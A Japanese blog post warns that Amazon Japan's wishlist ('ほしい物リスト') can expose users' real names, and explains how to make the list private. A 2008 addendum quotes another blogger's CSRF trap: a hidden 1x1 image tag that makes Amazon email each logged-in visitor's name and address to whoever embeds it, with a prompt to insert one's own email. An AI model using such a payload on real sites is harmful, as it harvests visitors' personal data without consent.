Travellers Tales

通販サイトの アマゾンは便利なので使っている人は多いと思います。

注文金額合計が1,500円以上なら送料は無料だし、本や CD のような再販制度により定価販売されているものでも、購入金額に応じて500円から最大1000円のギフト券による還元があります。

ウィッシュリストの使い方と落とし穴

Amazon 便利な機能の1つにウィッシュリストがあります。本来は欲しいなと思っている商品を登録しておき、それを家族や友達に公開することでプレゼントの購入等に役立ててもらう、という機能です。

この本来の使い方をしている人は日本には少ないのではないかと私は思っているのですが、この機能を備忘録的に使っている人は意外に多いのではないでしょうか。ショッピングカートに入れるほどではないけど、ちょっと気になる商品があったときに、「ウィッシュリストに加える」ボタンをクリックしておけば、ウィッシュリストにその商品を覚えさせておけるからです。

しかし、このウィッシュリスト、個人情報が漏れる原因になるという批判があります。アメリカではセキュリティの専門家が Amazonのウィッシュリストが子供を危険にさらすと指摘しています。

サイトのビジターは名前でウィッシュリストを検索できる。これは、自分がプレゼントを送りたい相手がウィッシュリストを作成しているかどうか確認することが目的と見られる。しかし、見知らぬ人間が、単純によくあるファーストネームで検索して子供を見つけ、リストをスクロールして姓と市町村名、州を掲載している相手を見つけることは比較的簡単だ。

ただ、備忘録的にウィッシュリストを使っているだけなら、名前に本名を使わないようにしていればさほど問題がない気もします。ウィッシュリスト サーチではメールアドレスでも検索できますが。また、その他にも、レビューを書いているとそこからウィッシュリストがわかってしまうという気になる話があります。

レビューからウィッシュリストがたどれる?

Amazon にはレビューを投稿する機能があります。レビューは好きな名前で公開できますが、レビュアーとして表示された名前のリンクをクリックすると、「○○さんについて」という投稿者のプロフィールのページが開きます。ここではそのアカウントで今までに書いたすべてのレビューや"リストマニア"リストが見れます。このページには「○○のレビュー、ウィッシュリスト、"リストマニア"リスト」と書かれています。するとこのプロフィールページからウィッシュリストがたどれてしまうのでしょうか?

かつてはレビューからプロフィールを経由してウィッシュリストまでたどれました。本当は痛いテレビ番組: Amazonでレビューを書くと本名が晒されるというブログ記事を読んで、自分のものを確認したところ、確かにそうなっていたのでびっくりしました。

しかし、この記事を書こうと思って、改めてプロフィールページからウィッシュリストへ行けるかいろいろ試してみたのですが、そのような状態になっているものが発見できませんでした。Amazon は批判を受けて仕様を改善したのでしょうか。＠delicious: Amazon でレビューを書くと本名が晒されてしまう危険！？を読むと、今年の4月の時点ではまだレビューからウィッシュリストまでたどれたようです。プロフィールページにも「○○のレビュー、ウィッシュリスト、"リストマニア"リスト」とウィッシュリストの文字がまだ存在します。

プライバシーが気になるならウィッシュリストは非公開設定に

以上で書いたように、結局、この問題が解決したのかしてないのかはっきりしなかったのですが、解決していなかったとしてもプライバシーをさらさないようにする設定ができます。この問題を知ったときに Amazon に問い合わせのメールを送ったところ、ウィッシュリストを非公開にする方法が返事で来ました。

ウィッシュリストの名前を表示させないことをご希望の場合には、ウィッシュリスト を公開しないよう設定いただく必要がございます。一度ウィッシュリストを設定いた だいた場合には、削除いただいた場合でもこの設定が必要となりますことをご了承く ださい。

お客様のウィッシュリストには現在商品のリストがございませんので、一度何か商品 を1点ウィッシュリストに入れていただき、ウィッシュリストのページにて「作成者 の情報」が表示される状態になってから、「作成者の情報」の「ウィッシュリストを 公開する」のチェックをはずしてください。なお、反映には数日お時間を要する場合 がございますことをご了承ください。

ウィッシュリストは最初に作ったときは公開の設定になっていますので、気になる方は上記の通り、非公開の設定に変更することをお勧めします。現在は上記のメールと細かい点が異なっているように思うのですが、Amazon にサイン・イン (ログイン) した状態で、画面上部の「カートを見る」と「アカウントサービス」「ヘルプ」の間にある「ウィッシュリスト」をクリックして開いたページにある「作成者」情報欄の右上の「設定内容を変更する」から設定が変更できます。

また、以前はできなかったと思うのですが、今はウィッシュリストを複数作ることができるようになっています。それを利用して公開用と非公開用のウィッシュリストを分けるのもよいと思います。ウィッシュリスト追加時には、ちゃんと追加先のリストを選択できるようになっています。レビューを書いていない方も、一度はウィッシュリスト サーチで自分の状態を確認してみましょう。（もちろんウィッシュリストを使っていなければ必要ありませんが。）

追記

その後、別アカウントを作ってウィッシュリストを公開してみたのですが、プロフィールページからウィッシュリストはたどれませんでした。レビューからウィッシュリスト（および付随する情報）がばれることはないということになります。Amazon はプライバシーを考慮して、仕様を変更したのかなぁ。

やっぱりレビューからウィッシュリストをたどって本名がばれます（2007年11月追記）

当記事に言及してくれているブログで Amazon のレビューから本名を確認できるとの記述がありました。

当記事を書いた頃には、上の追記で書いたように、プロフィールページからウィッシュリストへのリンクがなくなっていたため、レビュー → プロフィール → ウィッシュリスト（本名の表示）とたどることができないようでした。

しかし、リンクは張っていただいた記事の記述を受けて、再度確認してみたところ、ウィッシュリストを公開設定にしていると、なんとレビューからプロフィールページ経由で、ウィッシュリストの本名がわかってしまいました。

仕様がまた変わったのでしょうか。

プライバシーを気にする方は、ウィッシュリストは非公開にすることをお勧めします。（2007年現在でも、初期設定ではウィッシュリストは「公開」の設定とのことです。）

ウィッシュリストがほしい物リストと名前を変え祭りに（2008年3月11日追記）

昨日からこの記事にアクセスがあるなーと思ったら、「ウィッシュリスト」が「ほしい物リスト」と名称を変えてリリースされた¹のをきっかけに、今になってからプライバシー問題に気が付く人たちが現れ、祭り状態になっているらしいです。ずっと前からあった機能なんですけどね。

しかし、単に検索できてしまうだけならまだしも、ほしい物リストを非公開にする設定していたとしても、Amazon にログインした状態である仕掛けをしたページを踏むと、それだけでページを開いた人の登録名とメールアドレスを送信してしまうという、素敵なセキュリティホールをはまちやさん²が発見。（気になる人は、以下のリンクは Amazon をログアウトしてから開く方が無難かも？）

はい！ 勘のいいみんなは、もうさっしがついたよね！
自分の日記に以下のようなコードを埋め込めば…

(↓ リンク先注意！ ぼくに本名とかばれちゃう可能性がありますよ！)

<img src="http://www.amazon.co.jp/gp/registry/send-nudge.html?ie=UTF8&type=wishlist&__mk_ja_JP=&list-type=wishlist&recipients=hamachiya2%40gmail.com&submit=submit" width="1" height="1">

※ hamachiya2%40gmail.com のところは、自分のメールアドレスに書き換えてね！

自分のサイトにアクセスした人の本名とメールアドレスを、Amazonがどんどこメールで送ってきてくれるよ！ 親切だね！
(ただし、アクセスした人がAmazonを利用していて、ほしい物リストを公開している場合に限る)
↑ログインした状態なら、リストの作成・公開に関係なく送信されるそうです！ 教えてくれてありがとう！

Amazon は何やら対策しているようだけど、祭りにならないと対処しないというのも、ちょっと。

追記：この脆弱性を利用したトラップは、ぼっさんトラップと命名されたようです。